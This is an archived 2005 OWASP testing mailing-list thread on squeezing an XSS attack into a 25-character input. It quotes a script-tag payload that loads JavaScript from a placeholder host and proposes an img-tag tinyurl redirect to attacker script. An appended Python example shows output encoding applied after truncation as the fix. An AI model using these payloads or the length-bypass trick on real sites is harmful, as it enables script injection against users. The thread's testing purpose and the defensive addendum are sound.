[OWASP-TESTING] XSS in 25 characters or less

Alex Smolen alsmola at yahoo.com
Wed May 18 15:07:36 EDT 2005


Actually, you could include the <img src=tinyurl.com/whatever>
and have the tiny URL point to a JavaScript somewhere.

Do I get my pint?

--- Alex Smolen <alsmola at yahoo.com> wrote:
> You could use tinyurl.com to embed a malicious link
> (say, one that executes an XST attack). This still
> requires a window larger than 25 to get the domain
> to execute a malicious XSS, I think.
> 
> --- Eoin Keary <eoinkeary at hotmail.com> wrote:
> > Hi,
> > I have a window of 25 chars to perform an XSS exploit.
> > Anything more is truncated by the server.
> >
> > <script src=http://a.com/z.js></script>
> >
> > - this is 39 chars
> > We can do HTML injection ("<a href=....") to a degree, but
> > has anyone any ideas on how to execute script in such a
> > small window (25 chars)?
> > We need to stay in the same domain (xyz.com) in order to
> > make the attack useful, so redirecting to another domain
> > with the "<a href..." is no good.
> >
> > First correct answer gets a pint of Guinness (Larry S,
> > you're not included for the pint as I owe you too many).
> >
> > Eoin
> 
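
The server-side truncation discussed in this thread limits length, not content: whatever fits in the window is still echoed as markup. The following is an added example, not code from the thread or its participants; the function names and the second sample string are constructed for illustration. It contrasts truncate-and-echo with HTML-encoding at the point of output, and shows why the encoding must come after the length limit.

```python
import html

LIMIT = 25  # truncation window described in the thread

# The 39-character string quoted in the thread.
THREAD_SAMPLE = "<script src=http://a.com/z.js></script>"
# Constructed benign input whose 24th character is "<".
CONSTRUCTED_SAMPLE = "Guinness pint for Eoin <3"


def truncate_only(value: str) -> str:
    """Behaviour described in the thread: cut to LIMIT, echo the rest raw."""
    return value[:LIMIT]


def truncate_then_encode(value: str) -> str:
    """Hardened: apply the length limit, then HTML-encode for output."""
    return html.escape(value[:LIMIT], quote=True)


def encode_then_truncate(value: str) -> str:
    """Wrong order: no raw markup survives, but the cut can split an entity."""
    return html.escape(value, quote=True)[:LIMIT]


def has_raw_markup(fragment: str) -> bool:
    """True if the fragment still carries characters an HTML parser acts on."""
    return any(ch in fragment for ch in "<>\"'")


if __name__ == "__main__":
    for sample in (THREAD_SAMPLE, CONSTRUCTED_SAMPLE):
        for fn in (truncate_only, truncate_then_encode, encode_then_truncate):
            out = fn(sample)
            print(f"{fn.__name__:22} len={len(out):2} "
                  f"raw_markup={has_raw_markup(out)!s:5} {out!r}")
```

The encoded form can be longer than the window (28 characters for the thread's sample), so a length limit belongs on the raw input and the encoding on the output path.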